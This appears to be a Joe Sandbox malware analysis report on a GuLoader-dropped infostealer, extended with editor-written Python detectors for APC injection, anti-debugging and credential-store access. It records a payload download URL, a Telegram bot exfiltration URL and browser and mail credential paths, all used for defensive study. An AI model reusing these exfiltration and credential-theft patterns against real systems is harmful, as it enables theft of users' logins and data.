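THREAD_HIDE_FROM_DEBUGGER = 0x11   # THREADINFOCLASS for NtSetInformationThread
PROCESS_DEBUG_PORT = 0x07          # PROCESSINFOCLASS for NtQueryInformationProcess

WRITE_APIS = {"NtWriteVirtualMemory", "WriteProcessMemory"}
APC_APIS = {"NtQueueApcThread", "NtQueueApcThreadEx", "QueueUserAPC"}
RESUME_APIS = {"NtResumeThread", "ResumeThread"}

# Constructed trace modelled on the report's chain: powershell.exe creates
# msiexec.exe suspended, writes a region at 0x3C30000, queues an APC on the
# child's initial thread, resumes it, and the payload then hides from debuggers.
# PID 1128 is the report's msiexec.exe; the other PIDs/TIDs are made up.
TRACE = [
    {"pid": 4200, "image": "powershell.exe", "api": "CreateProcessW",
     "args": {"path": r"C:\Windows\SysWOW64\msiexec.exe", "flags": CREATE_SUSPENDED,
              "child_pid": 1128, "child_tid": 7016}},
    {"pid": 4200, "image": "powershell.exe", "api": "NtWriteVirtualMemory",
     "args": {"target_pid": 1128, "base": 0x3C30000, "size": 0x1000}},
    {"pid": 4200, "image": "powershell.exe", "api": "NtQueueApcThread",
     "args": {"target_pid": 1128, "target_tid": 7016, "apc_routine": 0x3C30000}},
    {"pid": 4200, "image": "powershell.exe", "api": "NtResumeThread",
     "args": {"target_pid": 1128, "target_tid": 7016}},
    {"pid": 1128, "image": "msiexec.exe", "api": "NtSetInformationThread",
     "args": {"info_class": THREAD_HIDE_FROM_DEBUGGER}},
    {"pid": 1128, "image": "msiexec.exe", "api": "NtQueryInformationProcess",
     "args": {"info_class": PROCESS_DEBUG_PORT}},
]


def find_early_bird(trace):
    """One finding per injector/child pair that completes all four steps in
    order: create suspended -> write into the child -> queue an APC on a child
    thread -> resume.  Insisting on the order keeps a debugger, or an installer
    that creates a child suspended and merely resumes it, from matching."""
    pending = {}     # (injector_pid, child_pid) -> progress through the chain
    findings = []
    for ev in trace:
        api, args = ev["api"], ev["args"]
        if api.startswith("CreateProcess") and args.get("flags", 0) & CREATE_SUSPENDED:
            pending[(ev["pid"], args["child_pid"])] = {"stage": "suspended", "path": args["path"]}
            continue
        key = (ev["pid"], args.get("target_pid"))
        state = pending.get(key)
        if state is None:
            continue
        if api in WRITE_APIS and state["stage"] == "suspended":
            state["stage"] = "written"
        elif api in APC_APIS and state["stage"] == "written":
            state["stage"] = "apc"
            state["apc_routine"] = args.get("apc_routine")
        elif api in RESUME_APIS and state["stage"] == "apc":
            findings.append({
                "technique": "early bird APC injection",
                "injector": ev["image"], "injector_pid": ev["pid"],
                "target": state["path"], "target_pid": key[1],
                "apc_routine": state["apc_routine"],
            })
            del pending[key]
    return findings


ANTI_DEBUG_CALLS = {
    ("NtSetInformationThread", THREAD_HIDE_FROM_DEBUGGER):
        "ThreadHideFromDebugger: the thread stops delivering debug events",
    ("NtQueryInformationProcess", PROCESS_DEBUG_PORT):
        "ProcessDebugPort: non-zero when a debugger is attached",
}


def find_anti_debug(trace):
    """Flag the information-class values that only make sense as debugger checks."""
    findings = []
    for ev in trace:
        why = ANTI_DEBUG_CALLS.get((ev["api"], ev["args"].get("info_class")))
        if why:
            findings.append({"pid": ev["pid"], "image": ev["image"], "api": ev["api"], "why": why})
    return findings


if __name__ == "__main__":
    for finding in find_early_bird(TRACE) + find_anti_debug(TRACE):
        print(finding)
```

The correlation keys on the injector's PID and the child's PID rather than on thread handles because that is what process-level telemetry (Sysmon Event ID 1 plus 8/10, or an EDR's cross-process write and APC events) actually carries; a trace that only records handles would need a handle-to-PID map first.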

Stealing of Sensitive Information

Source: Yara match | File source: 00000005.00000002.3282055116.0000000021C11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: msiexec.exe PID: 1128, type: MEMORYSTR
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: Yara match | File source: Process Memory Space: msiexec.exe PID: 1128, type: MEMORYSTR
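Every file-open row above is the injected msiexec.exe reading a Chrome or Edge profile store (Login Data, Cookies, Web Data, History, Top Sites) or the Postbox mail profile directory; none of those paths has any business being opened by the Windows Installer. The following is an added example written for this page, not code from the sample or from Joe Sandbox, that classifies such file-open events and flags any opener other than the application that owns the profile. The event schema, the owner allowlist, the Thunderbird entry and the PIDs other than 1128 are assumptions.

```python
"""Added example (editor-written, not from the sample or Joe Sandbox):
flag non-browser / non-mail-client processes opening credential stores."""
from pathlib import PureWindowsPath

# Chromium profile files an infostealer reads, and what each one yields.
CHROMIUM_STORES = {
    "login data": "saved logins (DPAPI-protected; Chrome 127+ adds app-bound encryption)",
    "cookies": "session cookies",
    "web data": "autofill entries and saved payment methods",
    "history": "browsing history",
    "top sites": "most-visited sites",
}
# Lower-case path fragments of each profile root and the image allowed to open it.
CHROMIUM_ROOTS = {
    r"\appdata\local\google\chrome\user data": "chrome.exe",
    r"\appdata\local\microsoft\edge\user data": "msedge.exe",
}
MAIL_PROFILE_ROOTS = {
    r"\appdata\roaming\postboxapp\profiles": "postbox.exe",
    r"\appdata\roaming\thunderbird\profiles": "thunderbird.exe",
}

# Constructed events: the paths are the ones listed above; PIDs other than 1128 are made up.
SAMPLE_EVENTS = [
    {"image": "msiexec.exe", "pid": 1128,
     "path": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"image": "chrome.exe", "pid": 5100,
     "path": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"image": "msiexec.exe", "pid": 1128,
     "path": r"C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies"},
    {"image": "msiexec.exe", "pid": 1128, "path": r"C:\Windows\SysWOW64\msiexec.exe"},
    {"image": "msiexec.exe", "pid": 1128,
     "path": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History"},
    {"image": "msiexec.exe", "pid": 1128,
     "path": r"C:\Users\user\AppData\Roaming\PostboxApp\Profiles"},
]


def classify_file_open(event):
    """Return a finding for one {image, pid, path} event, or None when the
    access is unremarkable (not a credential store, or the owner itself)."""
    path = event["path"].lower()
    name = PureWindowsPath(event["path"]).name.lower()
    image = event["image"].lower()
    for root, owner in CHROMIUM_ROOTS.items():
        if root in path and name in CHROMIUM_STORES:
            if image == owner:
                return None            # the browser reading its own profile
            return {"image": event["image"], "pid": event["pid"], "path": event["path"],
                    "store": name, "yields": CHROMIUM_STORES[name], "expected_opener": owner}
    for root, owner in MAIL_PROFILE_ROOTS.items():
        if root in path and image != owner:
            return {"image": event["image"], "pid": event["pid"], "path": event["path"],
                    "store": "mail profile", "expected_opener": owner,
                    "yields": "account settings and stored mail passwords"}
    return None


def scan_file_opens(events):
    """Findings for every event, in input order, with the unremarkable ones dropped."""
    return [f for f in map(classify_file_open, events) if f is not None]


if __name__ == "__main__":
    for f in scan_file_opens(SAMPLE_EVENTS):
        print(f"{f['image']} (pid {f['pid']}) opened {f['store']!r}: {f['yields']}")
```

Sysmon does not log file reads, so in production this rule has to sit on EDR file-open telemetry or on Windows object-access auditing (Event ID 4663 with a SACL on the profile directories). Stealers also commonly copy Login Data to a temporary file before parsing it, so pairing this with a file-create rule on copies of these names outside the profile root catches the variant that never opens the original for long.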

Remote Access Functionality

Source: Yara match | File source: 00000005.00000002.3282055116.0000000021C11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: msiexec.exe PID: 1128, type: MEMORYSTR

MITRE ATT&CK Matrix

Reconstructed from the flattened matrix. The number in parentheses is the signature hit count displayed for that technique; techniques listed without a count had no matching signature.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
Execution: Windows Management Instrumentation (1); Native API (1); PowerShell (2); Cron; Launchd; Scheduled Task; Systemd Timers
Persistence: DLL Side-Loading (1); Registry Run Keys / Startup Folder (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
Privilege Escalation: DLL Side-Loading (1); Process Injection (311); Registry Run Keys / Startup Folder (1); Login Hook; Network Logon Script; RC Scripts; Startup Items
Defense Evasion: Obfuscated Files or Information (2); Software Packing (1); DLL Side-Loading (1); Masquerading (11); Virtualization/Sandbox Evasion (131); Process Injection (311); Compile After Delivery
Credential Access: OS Credential Dumping (1); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
Discovery: File and Directory Discovery (3); System Information Discovery (14); Security Software Discovery (111); Process Discovery (1); Virtualization/Sandbox Evasion (131); Application Window Discovery (1); System Network Configuration Discovery (1)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
Collection: Archive Collected Data (1); Data from Local System (1); Email Collection (1); Clipboard Data (1); Keylogging; GUI Input Capture; Web Portal Capture
Command and Control: Web Service (1); Ingress Tool Transfer (3); Encrypted Channel (11); Non-Application Layer Protocol (3); Application Layer Protocol (14); Multiband Communication; Commonly Used Port
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
Impact: System Shutdown/Reboot (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery
Behavior Graph ID: 1548204; Sample: DOC11042024.exe; Start date: 04/11/2024; Architecture: WINDOWS; Score: 100

• Start: DOC11042024.exe started
  Contacted: reallyfreegeoip.org, api.telegram.org, 3 other IPs or domains
  Signatures: Found malware configuration; Multi AV Scanner detection for submitted file; Yara detected GuLoader; 3 other signatures
  reallyfreegeoip.org: Tries to detect the country of the analysis system (by using the IP)
  api.telegram.org: Uses the Telegram API (likely for C&C communication)
• DOC11042024.exe
  Dropped: C:\Users\user\AppData\...\Isbjergs.Krs (ASCII)
  Signatures: Suspicious powershell command line found
  Started: powershell.exe
• powershell.exe
  Dropped: C:\Users\user\AppData\...\DOC11042024.exe (PE32); C:\Users\...\DOC11042024.exe:Zone.Identifier (ASCII)
  Signatures: Early bird code injection technique detected; Writes to foreign memory regions; Found suspicious powershell code related to unpacking or dynamic code loading; 3 other signatures
  Started: msiexec.exe, conhost.exe
• msiexec.exe
  DNS/IP: api.telegram.org 149.154.167.220 (443, 49901) TELEGRAMRU, United Kingdom; reallyfreegeoip.org 188.114.96.3 (443, 49811, 49819) CLOUDFLARENETUS, European Union; 2 other IPs or domains
  Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Hides threads from debuggers

Source | Detection | Scanner
DOC11042024.exe | 5% | ReversingLabs
DOC11042024.exe | 19% | Virustotal

Source | Detection | Scanner
C:\Users\user\AppData\Roaming\turkeyism\beredskabscentre\Tiderip213\DOC11042024.exe | 5% | ReversingLabs

No Antivirus matches

Source | Detection | Scanner
vyebetsh.sa.com | 0% | Virustotal

Source | Detection | Scanner | Label
https://duckduckgo.com/chrome_newtab | 0% | URL Reputation | safe
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
https://duckduckgo.com/ac/?q= | 0% | URL Reputation | safe
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | URL Reputation | safe
http://checkip.dyndns.org | 0% | URL Reputation | safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe
http://nsis.sf.net/NSIS_ErrorError | 0% | URL Reputation | safe
https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe
https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe
http://checkip.dyndns.org/ | 0% | URL Reputation | safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://nuget.org/nuget.exe | 0% | URL Reputation | safe
https://reallyfreegeoip.org | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe
https://reallyfreegeoip.org/xml/ | 0% | URL Reputation | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
vyebetsh.sa.com | 141.98.10.40 | true | false | | unknown
reallyfreegeoip.org | 188.114.96.3 | true | true | | unknown
api.telegram.org | 149.154.167.220 | true | true | | unknown
checkip.dyndns.com | 193.122.6.168 | true | false | | unknown
checkip.dyndns.org | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://reallyfreegeoip.org/xml/173.254.250.69 | false | | unknown
http://vyebetsh.sa.com/nMcrGmhC252.bin | false | | unknown
http://checkip.dyndns.org/ | false | URL Reputation: safe | unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:305090%0D%0ADate%20and%20Time:%2004/11/2024%20/%2016:35:45%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20305090%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | false | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | true
193.122.6.168 | checkip.dyndns.com | United States | 31898 | ORACLE-BMC-31898US | false
188.114.96.3 | reallyfreegeoip.org | European Union | 13335 | CLOUDFLARENETUS | true
141.98.10.40 | vyebetsh.sa.com | Lithuania | 209605 | HOSTBALTICLT | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1548204
Start date and time: 2024-11-04 07:12:12 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 40s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 7
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: DOC11042024.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@6/15@4/4
EGA Information:
• Successful, ratio: 66.7%
HCA Information:
• Successful, ratio: 90%
• Number of executed functions: 185
• Number of non-executed functions: 58
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 1372 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big; too many NtQueryValueKey calls found
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
01:13:03 | API Interceptor | 36x Sleep call for process: powershell.exe modified
01:13:41 | API Interceptor | 333950x Sleep call for process: msiexec.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
149.154.167.220 | Dbt5vPZaOa.exe | malicious | Snake Keylogger, VIP Keylogger |
 | PO.exe | malicious | MassLogger RAT, PureLog Stealer |
 | Request For Quotation RFQ1310.exe | malicious | MassLogger RAT, PureLog Stealer |
 | Quote.exe | malicious | MassLogger RAT |
 | SecuriteInfo.com.Win32.RansomX-gen.15724.13250.exe | malicious | MicroClip |
 | file.exe | malicious | Snake Keylogger, VIP Keylogger |
 | SWIFT COPY 2.doc | malicious | Snake Keylogger, VIP Keylogger |
 | Payment info.exe | malicious | MassLogger RAT, PureLog Stealer |
 | 2Lzx7LMDWV.exe | malicious | Snake Keylogger, VIP Keylogger |
 | Quotation Document.exe | malicious | MassLogger RAT, PureLog Stealer |
193.122.6.168 | Dbt5vPZaOa.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
 | SWIFT COPY 2.doc | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
 | z79PROFORMAINVOICE.exe | malicious | MassLogger RAT, PureLog Stealer | checkip.dyndns.org/
 | 2Lzx7LMDWV.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
 | Quotation Document.exe | malicious | MassLogger RAT, PureLog Stealer | checkip.dyndns.org/
 | PROFORMA FATURA pdf.exe | malicious | Snake Keylogger | checkip.dyndns.org/
 | clipper.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
 | na.doc | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
 | na.doc | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
 | na.doc | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
188.114.96.3 | PRICE ENQUIRY - RFQ 6000073650.exe | malicious | GuLoader | e3z1.shop/HT341/index.php
 | file.exe | malicious | LummaC, Amadey, Credential Flusher, Stealc, Vidar | documentreviewone.com/notes/document.exe
 | zK3150CS8q.exe | malicious | SmokeLoader | piratekings.online/tmp/index.php
 | file.exe | malicious | SmokeLoader | piratekings.online/tmp/index.php
 | Payment Slip_SJJ023639#U00faPDF.scr.exe | malicious | Snake Keylogger | filetransfer.io/data-package/XimZ5Qu2/download
 | DHL_IMPORT_8236820594.exe | malicious | FormBook | www.vrxlzluy.shop/o91n/
 | rQUOTATION_NOVQTRA071244__PDF.scr.exe | malicious | Snake Keylogger | filetransfer.io/data-package/8Koz7PwT/download
 | PRICE ENQUIRY - RFQ 6000073650.exe | malicious | Azorult, GuLoader | e3z1.shop/HT341/index.php
 | NF_Payment_Ref_FAN930276.exe | malicious | FormBook | www.timizoasisey.shop/3p0l/
 | FW CMA SHZ Freight invoice CHN1080769.exe | malicious | FormBook | www.bayarcepat19.click/5hcm/

Match | Associated Sample Name / URL | Detection | Threat Name | Context
reallyfreegeoip.org | Dbt5vPZaOa.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
 | PO.exe | malicious | MassLogger RAT, PureLog Stealer | 188.114.96.3
 | Request For Quotation RFQ1310.exe | malicious | MassLogger RAT, PureLog Stealer | 188.114.96.3
 | Quote.exe | malicious | MassLogger RAT | 188.114.97.3
 | file.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.97.3
 | Ziraat Bankasi Swift Mesaji.pdf.exe | malicious | MassLogger RAT | 188.114.96.3
 | Payment Slip_SJJ023639#U00faPDF.scr.exe | malicious | Snake Keylogger | 188.114.96.3
 | SWIFT COPY 2.doc | malicious | Snake Keylogger, VIP Keylogger | 188.114.97.3
 | rQUOTATION_NOVQTRA071244__PDF.scr.exe | malicious | Snake Keylogger | 188.114.97.3
 | Payment info.exe | malicious | MassLogger RAT, PureLog Stealer | 188.114.97.3
checkip.dyndns.com | Dbt5vPZaOa.exe | malicious | Snake Keylogger, VIP Keylogger | 193.122.6.168
 | PO.exe | malicious | MassLogger RAT, PureLog Stealer | 132.226.8.169
 | Request For Quotation RFQ1310.exe | malicious | MassLogger RAT, PureLog Stealer | 158.101.44.242
 | Quote.exe | malicious | MassLogger RAT | 132.226.247.73
 | file.exe | malicious | Snake Keylogger, VIP Keylogger | 193.122.130.0
 | Ziraat Bankasi Swift Mesaji.pdf.exe | malicious | MassLogger RAT | 193.122.130.0
 | Payment Slip_SJJ023639#U00faPDF.scr.exe | malicious | Snake Keylogger | 132.226.247.73
 | SWIFT COPY 2.doc | malicious | Snake Keylogger, VIP Keylogger | 132.226.8.169
 | rQUOTATION_NOVQTRA071244__PDF.scr.exe | malicious | Snake Keylogger | 158.101.44.242
 | Payment info.exe | malicious | MassLogger RAT, PureLog Stealer | 193.122.130.0
api.telegram.org | Dbt5vPZaOa.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
 | PO.exe | malicious | MassLogger RAT, PureLog Stealer | 149.154.167.220
 | Request For Quotation RFQ1310.exe | malicious | MassLogger RAT, PureLog Stealer | 149.154.167.220
 | Quote.exe | malicious | MassLogger RAT | 149.154.167.220
 | SecuriteInfo.com.Win32.RansomX-gen.15724.13250.exe | malicious | MicroClip | 149.154.167.220
 | file.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
 | SWIFT COPY 2.doc | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
                                                                            Payment info.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                            • 149.154.167.220
                                                                            2Lzx7LMDWV.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 149.154.167.220
                                                                            Quotation Document.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                            • 149.154.167.220
Match / Associated Sample Name / URL | Detection | Threat Name | Context

Match: ORACLE-BMC-31898US
Dbt5vPZaOa.exe | malicious | Snake Keylogger, VIP Keylogger | 193.122.6.168
Payload 94.75 (3).225.exe | malicious | Unknown | 130.61.142.133
Payload 94.75.225.exe | malicious | Unknown | 152.67.112.12
Request For Quotation RFQ1310.exe | malicious | MassLogger RAT, PureLog Stealer | 158.101.44.242
SecuriteInfo.com.Trojan.GenericKD.74442994.24259.8937.exe | malicious | Unknown | 132.145.248.22
file.exe | malicious | Snake Keylogger, VIP Keylogger | 193.122.130.0
Ziraat Bankasi Swift Mesaji.pdf.exe | malicious | MassLogger RAT | 193.122.130.0
SWIFT COPY 2.doc | malicious | Snake Keylogger, VIP Keylogger | 158.101.44.242
rQUOTATION_NOVQTRA071244__PDF.scr.exe | malicious | Snake Keylogger | 158.101.44.242
Payment info.exe | malicious | MassLogger RAT, PureLog Stealer | 158.101.44.242

Match: TELEGRAMRU
Dbt5vPZaOa.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
PO.exe | malicious | MassLogger RAT, PureLog Stealer | 149.154.167.220
LauncherV3.31.exe | malicious | Stealc, Vidar | 149.154.167.99
TLl24p3e6q.exe | malicious | Stealc, Vidar | 149.154.167.99
Request For Quotation RFQ1310.exe | malicious | MassLogger RAT, PureLog Stealer | 149.154.167.220
Quote.exe | malicious | MassLogger RAT | 149.154.167.220
SecuriteInfo.com.Win32.RansomX-gen.15724.13250.exe | malicious | MicroClip | 149.154.167.220
IP0XYLm4Uv.exe | malicious | Stealc, Vidar | 149.154.167.99
26HY8aPgae.exe | malicious | Unknown | 149.154.167.99
czxw4iVMHJ.exe | malicious | Stealc, Vidar | 149.154.167.99

Match: HOSTBALTICLT
Contract #U2116 KB #U2013 08152024 - 1.pif.exe | malicious | RedLine | 141.98.10.33
PRODUCT OVERVIEW.doc | malicious | Unknown | 141.98.10.11
tppc.elf | malicious | Unknown | 141.98.10.95
sarm6.elf | malicious | Mirai | 141.98.10.95
TRIAL IMG_00O0125RDER.exe | malicious | FormBook, GuLoader | 141.98.10.120
1316wjL1Ep.elf | malicious | Unknown | 141.98.10.95
17213054441f2891f24374c97759e4ac14183d6cfaeabe4240dc8794e61fa899b9e40b62fb429.dat-decoded.exe | malicious | Remcos | 141.98.10.11
Demand G2-2024.xlsx | malicious | FormBook | 141.98.10.47
171232524570452cfc1123de8b7cabf91834cbebe0e4fd1dae96e0b4418fab427bf67de7f5439.dat-decoded.exe | malicious | RisePro Stealer | 141.98.10.48
1712325246bbbf6f1de2af242e599680d3f96095835a7a7584ff1f1f967e4c2d3f319cbbe6606.dat-decoded.exe | malicious | PrivateLoader, RisePro Stealer | 141.98.10.48

Match: CLOUDFLARENETUS
segura.vbs | malicious | Remcos | 188.114.96.3
file.exe | malicious | LummaC, Stealc, Vidar | 188.114.97.3
Dbt5vPZaOa.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | 188.114.96.3
file.exe | malicious | LummaC, Stealc | 188.114.97.3
PO.exe | malicious | MassLogger RAT, PureLog Stealer | 188.114.96.3
file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar | 188.114.96.3
MV Sunshine.exe | malicious | FormBook | 172.67.206.245
file.exe | malicious | LummaC, Stealc, Vidar | 188.114.96.3
PRICE ENQUIRY - RFQ 6000073650.exe | malicious | GuLoader | 188.114.96.3
Match / Associated Sample Name / URL | Detection | Threat Name | Context

Match: 54328bd36c14bd82ddaa0c04b25ed9ad
Dbt5vPZaOa.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
PO.exe | malicious | MassLogger RAT, PureLog Stealer | 188.114.96.3
Request For Quotation RFQ1310.exe | malicious | MassLogger RAT, PureLog Stealer | 188.114.96.3
Quote.exe | malicious | MassLogger RAT | 188.114.96.3
file.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
Ziraat Bankasi Swift Mesaji.pdf.exe | malicious | MassLogger RAT | 188.114.96.3
Payment Slip_SJJ023639#U00faPDF.scr.exe | malicious | Snake Keylogger | 188.114.96.3
rQUOTATION_NOVQTRA071244__PDF.scr.exe | malicious | Snake Keylogger | 188.114.96.3
Payment info.exe | malicious | MassLogger RAT, PureLog Stealer | 188.114.96.3
z79PROFORMAINVOICE.exe | malicious | MassLogger RAT, PureLog Stealer | 188.114.96.3

Match: 3b5074b1b5d032e5620f69f9f700ff0e
segura.vbs | malicious | Remcos | 149.154.167.220
Dbt5vPZaOa.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
PO.exe | malicious | MassLogger RAT, PureLog Stealer | 149.154.167.220
Payslip_October_2024_pdf.exe | malicious | AgentTesla | 149.154.167.220
V7FWuG5Lct.exe | malicious | Quasar | 149.154.167.220
7ll96oOSBF.exe | malicious | Quasar | 149.154.167.220
Payload 94.75 (4).225.exe | malicious | Kronos, Strela Stealer | 149.154.167.220
VsXpA6fSbk.js | malicious | Unknown | 149.154.167.220
VsXpA6fSbk.js | malicious | Unknown | 149.154.167.220
lDPmx9XNXu.exe | malicious | Unknown | 149.154.167.220
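The context tables above list the network indicators this sample shares with other submissions: the checkip.dyndns.com country lookup, the api.telegram.org exfiltration endpoint and its addresses, and two JA3 fingerprints. What follows is an added example, not part of the Joe Sandbox report: a small Python correlator that scores per-process connection events against those indicators, treating a checkip.dyndns.com lookup followed by a Telegram API connection from the same process as the strong signal and a JA3 hit on its own as weak. The indicator values are copied from the tables; the CSV event format and the four sample events are constructed for the example and are not taken from the report.

```python
"""Correlate process network events with the context IOCs from this report.

Added example, not part of the Joe Sandbox report. Indicator values come from
the report's context tables; the event format and the log lines are constructed
for the example.
"""
import csv
import io
from collections import defaultdict

# Network indicators from the context tables.
GEOIP_CHECK_HOSTS = {"checkip.dyndns.com"}
TELEGRAM_HOSTS = {"api.telegram.org"}
TELEGRAM_IPS = {"149.154.167.220", "149.154.167.99"}
# JA3 values from the context tables. The same page lists them beside Remcos,
# Quasar, AgentTesla, Kronos and MassLogger samples, so a JA3 hit alone proves little.
WEAK_JA3 = {"54328bd36c14bd82ddaa0c04b25ed9ad", "3b5074b1b5d032e5620f69f9f700ff0e"}

ALERT_THRESHOLD = 6

# Constructed sample events (assumed CSV format: ts,image,dst_host,dst_ip,ja3).
SAMPLE_EVENTS = (
    "ts,image,dst_host,dst_ip,ja3\n"
    "2024-11-04T10:00:01Z,C:\\Users\\user\\Desktop\\DOC11042024.exe,"
    "checkip.dyndns.com,193.122.6.168,54328bd36c14bd82ddaa0c04b25ed9ad\n"
    "2024-11-04T10:00:03Z,C:\\Users\\user\\Desktop\\DOC11042024.exe,"
    "api.telegram.org,149.154.167.220,54328bd36c14bd82ddaa0c04b25ed9ad\n"
    "2024-11-04T10:05:00Z,C:\\Program Files\\Telegram Desktop\\Telegram.exe,"
    "api.telegram.org,149.154.167.220,3b5074b1b5d032e5620f69f9f700ff0e\n"
    "2024-11-04T10:06:00Z,C:\\Windows\\System32\\svchost.exe,"
    "update.example.net,203.0.113.10,3b5074b1b5d032e5620f69f9f700ff0e\n"
)


def parse_events(text):
    """Parse CSV event text into a list of dicts, sorted by timestamp."""
    rows = list(csv.DictReader(io.StringIO(text)))
    return sorted(rows, key=lambda r: r["ts"])


def is_geoip_check(ev):
    return ev["dst_host"].lower() in GEOIP_CHECK_HOSTS


def is_telegram(ev):
    return ev["dst_host"].lower() in TELEGRAM_HOSTS or ev["dst_ip"] in TELEGRAM_IPS


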